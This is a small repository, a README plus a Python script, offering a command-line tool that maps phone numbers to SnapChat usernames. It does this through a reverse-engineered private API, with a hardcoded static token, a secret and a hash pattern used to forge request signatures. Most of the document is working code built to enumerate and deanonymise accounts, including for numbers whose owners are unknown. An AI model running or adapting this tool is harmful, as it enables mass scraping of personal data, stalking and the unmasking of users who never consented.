├── README.md └── sc-findusers.py /README.md: -------------------------------------------------------------------------------- 1 | sc-findusers 2 | ============ 3 | 4 | A command line tool used to find the SnapChat usernames for known or unknown phone numbers 5 | 6 | ## Usage 7 | 8 | >$ python sc-findusers.py username password number1,number2 9 | > 10 | >success: found 2 results: 11 | > number: number1 12 | > username: number1s_username 13 | > 14 | > number: number2 15 | > username: number2s_username 16 | 17 | 18 | ## Prerequisites 19 | 20 | The following python libraries are required: 21 | 22 | * requests 23 | * hashlib 24 | * simplejson 25 | 26 | ## Credits 27 | 28 | Thanks a lot to the following people and their resources, a majority of the work was already done by them 29 | 30 | * [Thomas Lackner](https://github.com/tlack/snaphax) 31 | * [Adam Caudill](http://adamcaudill.com/2012/06/16/snapchat-api-and-security/) 32 | * [kivikakk](https://kivikakk.ee/2013/05/10/snapchat.html) 33 | 34 | ## Tools Used 35 | 36 | I used a few different tools to figure out what needed to be sent to the snapchat server, would have been much more difficult without them. 37 | 38 | * [APK dissasembler](http://code.google.com/p/easy-apk-dissassembler/) 39 | * [android-apktool](https://code.google.com/p/android-apktool/) 40 | * ettercap 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /sc-findusers.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys 4 | import requests 5 | import hashlib 6 | import time 7 | import simplejson 8 | 9 | TOKEN = 'm198sOkJEn37DjqZ32lpRu76xmw288xSQ9' 10 | SECRET = 'iEk21fuwZApXlz93750dmW22pw389dPwOk' 11 | HASH_PATTERN = '0001110111101110001111010101111011010001001110011000110001000110' 12 | BASE_URL = 'https://feelinsonice.appspot.com' 13 | 14 | def main(args): 15 | if len(args) < 2: 16 | print "usage: python sc-findusers.py " 17 | exit(0) 18 | 19 | # log in 20 | ts = time.mktime(time.gmtime()) 21 | params = {'username': args[1], 'password': args[2], 'timestamp': ts} 22 | 23 | r = sc_request('/ph/login', params, TOKEN, ts) 24 | 25 | # subsequent API calls should use this token instead of the static token 26 | auth_token = r['auth_token'] 27 | 28 | ts = time.mktime(time.gmtime()) 29 | numbers = {} 30 | for number in args[3].split(','): 31 | numbers[number] = number 32 | 33 | numbers_json = simplejson.dumps(numbers) 34 | params = {'username': args[1], 'timestamp': ts, 'numbers': numbers_json, 'countryCode': 'US'} 35 | try: 36 | r = sc_request('/ph/find_friends', params, auth_token, ts) 37 | except: 38 | print 'error: failed to retrieve numbers results' 39 | exit(0) 40 | 41 | print '\nsuccess: found %d results:' % len(r['results']) 42 | 43 | for number in r['results']: 44 | print '\tnumber: ' + number['display'] 45 | print '\tusername: ' + number['name'] 46 | print '' 47 | 48 | 49 | 50 | 51 | 52 | def sc_request(uri, post_params, tok, ts): 53 | url = BASE_URL + uri 54 | post_params['req_token'] = sc_hash(tok, ts) 55 | r = requests.post(url, data = post_params) 56 | r.raise_for_status() 57 | return r.json() 58 | 59 | 60 | # seriously, snapchat team? 61 | def sc_hash(tok, ts): 62 | h1 = hashlib.sha256(SECRET + tok).hexdigest() 63 | h2 = hashlib.sha256(str(ts) + SECRET).hexdigest() 64 | 65 | result = '' 66 | for i in range(0, len(HASH_PATTERN)): 67 | if HASH_PATTERN[i] == '0': 68 | result += h1[i] 69 | else: 70 | result += h2[i] 71 | 72 | return result 73 | 74 | 75 | 76 | 77 | if __name__ == "__main__": 78 | main(sys.argv) 79 | --------------------------------------------------------------------------------